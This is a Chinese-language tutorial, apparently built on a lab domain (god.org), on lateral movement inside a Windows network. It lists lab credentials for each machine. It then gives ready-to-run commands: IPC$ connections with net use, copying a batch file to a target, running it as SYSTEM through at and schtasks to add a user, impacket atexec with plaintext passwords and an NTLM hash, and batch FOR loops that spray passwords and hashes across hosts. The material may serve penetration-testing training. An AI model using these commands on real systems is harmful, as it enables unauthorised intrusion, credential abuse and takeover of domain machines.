内网渗透-at&schtasks&impacket的使用

内网机器结构

机器账号密码如下：

2008 r2 webserver 　　域内 web 服务器 　　本地管理员账号密码 : .\administraotr:admin!@#45 　　当前机器域用户密码 : god\webadmin:admin!@#45

2003 x86 fileserver 　　域内文件服务器 　　 本地管理员账号密码 : administrator : admin 　　　　    当前机器域用户密码 : god\fileadmin : Admin12345

2008 r2 x64 dc god.org 主域控机器 　　　　  域管账号密码: God\administrator : Admin12345

2012 sqlserver 域内数据库服务器 　　　　　本地管理员账号密码 : .\administrator:admin!@#45 　　　当前机器域用户密码 : god\dbadmin:admin!@#45

w7 x64 mary-pc 域内个人机 　　　　　　　 本地管理员账号密码 : .\mary : admin 　　　　　　　　　  当前机器域用户密码 : god\mary : admin!@#45

w8.1 x64 jack-pc 域内个人机　　　　　　    本地管理员账号密码 : .\jack : admin 　　　　　　　　  当前机器域用户密码 : god\boss : Admin12345

（1）横向渗透明文传递at&schtasks

在拿下了一台内网主机之后，通过本地信息收集用户凭证等信息之后，为了拿下更多的主机，可以使用at&schtasks命令，在已知目标系统的明文用户明文密码的基础上，直接可以在远程主机上执行命令

比方说：1.获取到了某域内主机的权限

　　　　2.通过minikatz得到了明文密码

　　　　3.用信息收集到域中的用户列表作为用户名字典

　　　　4.用得到的明文密码作为密码字典

　　　　5.尝试连接

　　　　6.创建计划任务（at|schtasks）

　　　　7.执行文件可以是后门代码或者相关命令

• 利用流程：

　　　　1.建立IPC连接到目标主机

　　　　2.拷贝要执行的命令脚本到目标主机

　　　　3.查看目标时间，创建计划任务（at、schtasks）定时执行拷贝到的脚本

　　　　4.删除IPC连接

• 命令:

　　　　net use \\server\ipc$"password" /user:username 　　# 工作组

　　　　net use \\server\ipc$"password" /user:domain\username 　　#域内

　　　　dir \\xx.xx.xx.xx\C$\ 　　# 查看文件列表

　　　　copy \\xx.xx.xx.xx\C$\1.bat 1.bat 　　# 下载文件

　　　　copy 1.bat \\xx.xx.xx.xx\C$ 　　# 复制文件

　　　　net use \\xx.xx.xx.xx\C$\1.bat /del 　　# 删除

　　　　IPC net view xx.xx.xx.xx 　　# 查看对方共享

• 建立 IPC 常见的错误代码

（1）5：拒绝访问，可能是使用的用户不是管理员权限，需要先提升权限

（2）51：网络问题，Windows 无法找到网络路径

（3）53：找不到网络路径，可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题

（4）67：找不到网络名，本地 Lanmanworkstation 服务未启动，目标删除 ipc$

（5）1219：提供的凭据和已存在的凭据集冲突，说明已建立 IPC$，需要先删除

（6）1326：账号密码错误

（7）1792：目标 NetLogon 服务未启动，连接域控常常会出现此情况

（8）2242：用户密码过期，目标有账号策略，强制定期更改密码

• 建立 IPC 失败的原因

（1）目标系统不是 NT 或以上的操作系统

（2）对方没有打开 IPC$共享

（3）对方未开启 139、445 端口，或者被防火墙屏蔽

（4）输出命令、账号密码有错误

• [at] & [schtasks]的操作过程

at要在Windows2012以下版本使用

1 net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad
2 ministrator # 建立 ipc 连接
3 copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器
4 at \\192.168.3.21 15:47 c:\add.bat #添加计划任务

schtasks要在Windows2012及以上版本使用

1 net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad
2 ministrator # 建立 ipc 连接：
3 copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘
4 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件
5 schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
6 schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务

at命令实际操作：

使用net use命令连接域控主机，假设已经知道域控的账号密码

然后将以下脚本写入add.bat

将脚本写入域控的C盘中

可以看到文件成功写入了

创建定时任务，执行add操作

可以看到leslie用户成功的被添加上去了

schtasks命令实际操作：

域用户无法操作，因此需要去连接本地administrator

连接

然后就使用即可

4 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件
5 schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
6 schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务

• atexec-impacket的使用

atexec.exe ./administrator:Admin12345@192.168.3.21 "whoami"

atexec.exe god/administrator:Admin12345@192.168.3.21 "whoami"

atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 "whoami"

#案例 3-横向渗透明文 HASH 传递批量利用-综合

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文 连接

FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应明文 回显版

FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@192.168.3.21 whoami #批量检测明文对应 IP 回显版

FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@192.168.3.21 whoami #批量检测 HASH 对应 IP 回显版